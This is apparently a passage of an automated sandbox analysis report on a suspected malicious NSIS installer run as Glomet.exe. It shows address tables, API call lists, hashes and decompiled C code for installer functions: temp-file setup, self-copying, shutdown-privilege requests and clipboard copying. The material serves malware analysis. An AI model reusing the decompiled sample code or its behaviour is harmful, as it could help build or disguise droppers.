                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004036e4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403649
                                                                                                                                                                              0x0040360b
                                                                                                                                                                              0x0040360e
                                                                                                                                                                              0x00403611
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00403613
                                                                                                                                                                              0x00403615
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403615
                                                                                                                                                                              0x004035c6
                                                                                                                                                                              0x004035c9
                                                                                                                                                                              0x004035cc
                                                                                                                                                                              0x004035d2
                                                                                                                                                                              0x004035d2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004035d2
                                                                                                                                                                              0x004035ce
                                                                                                                                                                              0x004035d0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004035d0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004035a3
                                                                                                                                                                              0x004035a3
                                                                                                                                                                              0x004035a3
                                                                                                                                                                              0x004035a4
                                                                                                                                                                              0x004035a4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004035a3
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004034d8
                                                                                                                                                                              0x004034d9
                                                                                                                                                                              0x004034e5
                                                                                                                                                                              0x004034ec
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004034ee
                                                                                                                                                                              0x004034f0
                                                                                                                                                                              0x004034fe
                                                                                                                                                                              0x00403503
                                                                                                                                                                              0x0040350a
                                                                                                                                                                              0x0040350e
                                                                                                                                                                              0x00403512
                                                                                                                                                                              0x00403514
                                                                                                                                                                              0x00403514
                                                                                                                                                                              0x00403512
                                                                                                                                                                              0x0040351c
                                                                                                                                                                              0x00403523
                                                                                                                                                                              0x00403529
                                                                                                                                                                              0x00403541
                                                                                                                                                                              0x00403551
                                                                                                                                                                              0x00403556
                                                                                                                                                                              0x0040355c
                                                                                                                                                                              0x00403563
                                                                                                                                                                              0x0040356f
                                                                                                                                                                              0x00403579
                                                                                                                                                                              0x0040357b
                                                                                                                                                                              0x0040357d
                                                                                                                                                                              0x00403581
                                                                                                                                                                              0x00403581
                                                                                                                                                                              0x00403590
                                                                                                                                                                              0x00403596
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403596
                                                                                                                                                                              0x004034ec
                                                                                                                                                                              0x0040340b
                                                                                                                                                                              0x00403416
                                                                                                                                                                              0x0040341f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403421
                                                                                                                                                                              0x00403434
                                                                                                                                                                              0x0040343a
                                                                                                                                                                              0x00403440
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403440

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004033D6
                                                                                                                                                                              • GetVersionExA.KERNEL32(?), ref: 004033FF
                                                                                                                                                                              • GetVersionExA.KERNEL32(0000009C), ref: 00403416
                                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034DF
                                                                                                                                                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040351C
                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403523
                                                                                                                                                                              • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403541
                                                                                                                                                                              • GetCommandLineA.KERNEL32(ARBEJDSTILLADELSER Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403556
                                                                                                                                                                              • CharNextA.USER32(00000000,"C:\programdata\Glomet.exe" ,00000020,"C:\programdata\Glomet.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403590
                                                                                                                                                                              • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403689
                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040369A
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036A6
                                                                                                                                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036BA
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036C2
                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036D3
                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036DB
                                                                                                                                                                              • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036EF
                                                                                                                                                                              • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 0040379A
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004037BB
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\programdata\Glomet.exe" ,00000000,?,?,00000007,00000009,0000000B), ref: 004037CE
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A14C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\programdata\Glomet.exe" ,00000000,?,?,00000007,00000009,0000000B), ref: 004037DD
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\programdata\Glomet.exe" ,00000000,?,?,00000007,00000009,0000000B), ref: 004037E8
                                                                                                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\programdata,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\programdata\Glomet.exe" ,00000000,?,?,00000007,00000009,0000000B), ref: 004037F4
                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403810
                                                                                                                                                                              • DeleteFileA.KERNEL32(00429450,00429450,?,00430000,?,?,00000007,00000009,0000000B), ref: 0040386D
                                                                                                                                                                              • CopyFileA.KERNEL32(C:\programdata\Glomet.exe,00429450,00000001), ref: 00403882
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00429450,00429450,?,00429450,00000000,?,00000007,00000009,0000000B), ref: 004038AF
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038DD
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004038E4
                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403917
                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 0040393C
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040395D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                              • String ID: "$"C:\programdata\Glomet.exe" $.tmp$1033$A$ARBEJDSTILLADELSER Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1$C:\programdata$C:\programdata\Glomet.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                              • API String ID: 1000954069-1385142115
                                                                                                                                                                              • Opcode ID: 7c630d5b1c8c78dc8f49951f734bd62ae9556d55dda655a8d4d406bedb351979
                                                                                                                                                                              • Instruction ID: 223053d6f2ec0cc509bcc84454fcb5a587f3d9304b07d6be13cf3966b97333d0
                                                                                                                                                                              • Opcode Fuzzy Hash: 7c630d5b1c8c78dc8f49951f734bd62ae9556d55dda655a8d4d406bedb351979
                                                                                                                                                                              • Instruction Fuzzy Hash: DCE1F470904354AADB21AF759D49B6F7EB8AF4570AF0440BFE441B62D2CB7C4A05CB2E
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004054B6 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 144 4054b6-4054d2 145 405661-405667 144->145 146 4054d8-40559f GetDlgItem * 3 call 404309 call 404bfa GetClientRect GetSystemMetrics SendMessageA * 2 144->146 148 405691-40569d 145->148 149 405669-40568b GetDlgItem CreateThread FindCloseChangeNotification 145->149 164 4055a1-4055bb SendMessageA * 2 146->164 165 4055bd-4055c0 146->165 151 4056bf-4056c5 148->151 152 40569f-4056a5 148->152 149->148 156 4056c7-4056cd 151->156 157 40571a-40571d 151->157 154 4056e0-4056e7 call 40433b 152->154 155 4056a7-4056ba ShowWindow * 2 call 404309 152->155 168 4056ec-4056f0 154->168 155->151 161 4056f3-405703 ShowWindow 156->161 162 4056cf-4056db call 4042ad 156->162 157->154 159 40571f-405725 157->159 159->154 166 405727-40573a SendMessageA 159->166 169 405713-405715 call 4042ad 161->169 170 405705-40570e call 405378 161->170 162->154 164->165 173 4055d0-4055e7 call 4042d4 165->173 174 4055c2-4055ce SendMessageA 165->174 175 405740-40576c CreatePopupMenu call 4062ea AppendMenuA 166->175 176 405837-405839 166->176 169->157 170->169 183 4055e9-4055fd ShowWindow 173->183 184 40561d-40563e GetDlgItem SendMessageA 173->184 174->173 181 405781-405797 TrackPopupMenu 175->181 182 40576e-40577e GetWindowRect 175->182 176->168 181->176 186 40579d-4057b7 181->186 182->181 187 40560c 183->187 188 4055ff-40560a ShowWindow 183->188 184->176 185 405644-40565c SendMessageA * 2 184->185 185->176 189 4057bc-4057d7 SendMessageA 186->189 190 405612-405618 call 404309 187->190 188->190 189->189 191 4057d9-4057f9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->191 190->184 193 4057fb-40581b SendMessageA 191->193 193->193 194 40581d-405831 GlobalUnlock SetClipboardData CloseClipboard 193->194 194->176
                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                              			E004054B6(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x20378
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E0040544A, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						FindCloseChangeNotification(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062EA(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a890;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8);
							__eflags =  *0x42f4ac - _t150;
							if( *0x42f4ac == _t150) {
								_t113 =  *0x42a068; // 0x59dddc
								E00405378( *((intOrPtr*)(_t113 + 0x34)), _t150);
							}
							E004042AD(1);
							goto L25;
						}
						 *0x429c60 = 2;
						E004042AD(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E0040433B(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E00404309(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f430;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E00404309( *0x42ebf0);
				 *0x42ebf4 = E00404BFA(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D4(_a4);
				if(( *0x42f438 & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f438 & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404309( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f438 & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}





































                                                                                                                                                                              0x004054bc
                                                                                                                                                                              0x004054c4
                                                                                                                                                                              0x004054c7
                                                                                                                                                                              0x004054cf
                                                                                                                                                                              0x004054d2
                                                                                                                                                                              0x00405661
                                                                                                                                                                              0x00405667
                                                                                                                                                                              0x00405684
                                                                                                                                                                              0x0040568b
                                                                                                                                                                              0x0040568b
                                                                                                                                                                              0x00405697
                                                                                                                                                                              0x0040569d
                                                                                                                                                                              0x004056bf
                                                                                                                                                                              0x004056bf
                                                                                                                                                                              0x004056c5
                                                                                                                                                                              0x0040571a
                                                                                                                                                                              0x0040571a
                                                                                                                                                                              0x0040571d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040571f
                                                                                                                                                                              0x00405722
                                                                                                                                                                              0x00405725
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040572f
                                                                                                                                                                              0x00405735
                                                                                                                                                                              0x00405737
                                                                                                                                                                              0x0040573a
                                                                                                                                                                              0x00405837
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405837
                                                                                                                                                                              0x00405749
                                                                                                                                                                              0x00405755
                                                                                                                                                                              0x0040575e
                                                                                                                                                                              0x00405765
                                                                                                                                                                              0x00405769
                                                                                                                                                                              0x0040576c
                                                                                                                                                                              0x00405775
                                                                                                                                                                              0x0040577b
                                                                                                                                                                              0x0040577e
                                                                                                                                                                              0x0040577e
                                                                                                                                                                              0x0040578e
                                                                                                                                                                              0x00405794
                                                                                                                                                                              0x00405797
                                                                                                                                                                              0x004057a2
                                                                                                                                                                              0x004057a2
                                                                                                                                                                              0x004057a3
                                                                                                                                                                              0x004057a6
                                                                                                                                                                              0x004057ad
                                                                                                                                                                              0x004057b4
                                                                                                                                                                              0x004057bc
                                                                                                                                                                              0x004057bc
                                                                                                                                                                              0x004057ca
                                                                                                                                                                              0x004057d0
                                                                                                                                                                              0x004057d3
                                                                                                                                                                              0x004057d3
                                                                                                                                                                              0x004057da
                                                                                                                                                                              0x004057e0
                                                                                                                                                                              0x004057e9
                                                                                                                                                                              0x004057f0
                                                                                                                                                                              0x004057f9
                                                                                                                                                                              0x004057fb
                                                                                                                                                                              0x004057fe
                                                                                                                                                                              0x0040580d
                                                                                                                                                                              0x0040580f
                                                                                                                                                                              0x00405812
                                                                                                                                                                              0x00405813
                                                                                                                                                                              0x00405816
                                                                                                                                                                              0x00405817
                                                                                                                                                                              0x00405818
                                                                                                                                                                              0x00405818
                                                                                                                                                                              0x00405820
                                                                                                                                                                              0x0040582b
                                                                                                                                                                              0x00405831
                                                                                                                                                                              0x00405831
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405797
                                                                                                                                                                              0x004056c7
                                                                                                                                                                              0x004056cd
                                                                                                                                                                              0x004056fb
                                                                                                                                                                              0x004056fd
                                                                                                                                                                              0x00405703
                                                                                                                                                                              0x00405705
                                                                                                                                                                              0x0040570e
                                                                                                                                                                              0x0040570e
                                                                                                                                                                              0x00405715
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00405715
                                                                                                                                                                              0x004056d1
                                                                                                                                                                              0x004056db
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040569f
                                                                                                                                                                              0x0040569f
                                                                                                                                                                              0x004056a5
                                                                                                                                                                              0x004056e0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004056e7
                                                                                                                                                                              0x004056ae
                                                                                                                                                                              0x004056b5
                                                                                                                                                                              0x004056ba
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004056ba
                                                                                                                                                                              0x0040569d
                                                                                                                                                                              0x004054d8
                                                                                                                                                                              0x004054dc
                                                                                                                                                                              0x004054e4
                                                                                                                                                                              0x004054e8
                                                                                                                                                                              0x004054eb
                                                                                                                                                                              0x004054ee
                                                                                                                                                                              0x004054f1
                                                                                                                                                                              0x004054f4
                                                                                                                                                                              0x004054f5
                                                                                                                                                                              0x004054f6
                                                                                                                                                                              0x0040550f
                                                                                                                                                                              0x00405512
                                                                                                                                                                              0x0040551c
                                                                                                                                                                              0x0040552b
                                                                                                                                                                              0x00405533
                                                                                                                                                                              0x0040553b
                                                                                                                                                                              0x00405540
                                                                                                                                                                              0x00405543
                                                                                                                                                                              0x0040554f
                                                                                                                                                                              0x00405558
                                                                                                                                                                              0x00405561
                                                                                                                                                                              0x00405583
                                                                                                                                                                              0x00405589
                                                                                                                                                                              0x0040559a
                                                                                                                                                                              0x0040559f
                                                                                                                                                                              0x004055ad
                                                                                                                                                                              0x004055bb
                                                                                                                                                                              0x004055bb
                                                                                                                                                                              0x004055c0
                                                                                                                                                                              0x004055ce
                                                                                                                                                                              0x004055ce
                                                                                                                                                                              0x004055d3
                                                                                                                                                                              0x004055d6
                                                                                                                                                                              0x004055db
                                                                                                                                                                              0x004055e7
                                                                                                                                                                              0x004055f0
                                                                                                                                                                              0x004055fd
                                                                                                                                                                              0x0040560c
                                                                                                                                                                              0x004055ff
                                                                                                                                                                              0x00405604
                                                                                                                                                                              0x00405604
                                                                                                                                                                              0x00405618
                                                                                                                                                                              0x00405618
                                                                                                                                                                              0x0040562c
                                                                                                                                                                              0x00405635
                                                                                                                                                                              0x0040563e
                                                                                                                                                                              0x0040564e
                                                                                                                                                                              0x0040565a
                                                                                                                                                                              0x0040565a
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405515
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405524
                                                                                                                                                                              • GetClientRect.USER32 ref: 00405561
                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 00405568
                                                                                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405589
                                                                                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040559A
                                                                                                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055AD
                                                                                                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055BB
                                                                                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CE
                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055F0
                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405604
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405625
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405635
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564E
                                                                                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040565A
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405533
                                                                                                                                                                                • Part of subcall function 00404309: SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405676
                                                                                                                                                                              • CreateThread.KERNELBASE ref: 00405684
                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040568B
                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004056AE
                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056B5
                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004056FB
                                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572F
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405740
                                                                                                                                                                              • AppendMenuA.USER32 ref: 00405755
                                                                                                                                                                              • GetWindowRect.USER32 ref: 00405775
                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578E
                                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057CA
                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004057DA
                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004057E0
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E9
                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 004057F3
                                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405807
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405820
                                                                                                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 0040582B
                                                                                                                                                                              • CloseClipboard.USER32 ref: 00405831
                                                                                                                                                                              Strings
                                                                                                                                                                              • ARBEJDSTILLADELSER Setup: Installing, xrefs: 004057A6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                              • String ID: ARBEJDSTILLADELSER Setup: Installing
                                                                                                                                                                              • API String ID: 4154960007-1892138075
                                                                                                                                                                              • Opcode ID: 9f894bfef72f42a5d80c28a2cfb4653c4d0ae1818b29ab90f23da2409dea8f81
                                                                                                                                                                              • Instruction ID: 345e578925e8e8fc579d0e732d58a8f557a0115a7d420367cc7026d592e1690f
                                                                                                                                                                              • Opcode Fuzzy Hash: 9f894bfef72f42a5d80c28a2cfb4653c4d0ae1818b29ab90f23da2409dea8f81
                                                                                                                                                                              • Instruction Fuzzy Hash: D6A189B1900608BFDB11AF61DD89EAE7B79FB08354F40403AFA45B61A0CB758E51DF68
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00405A19 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
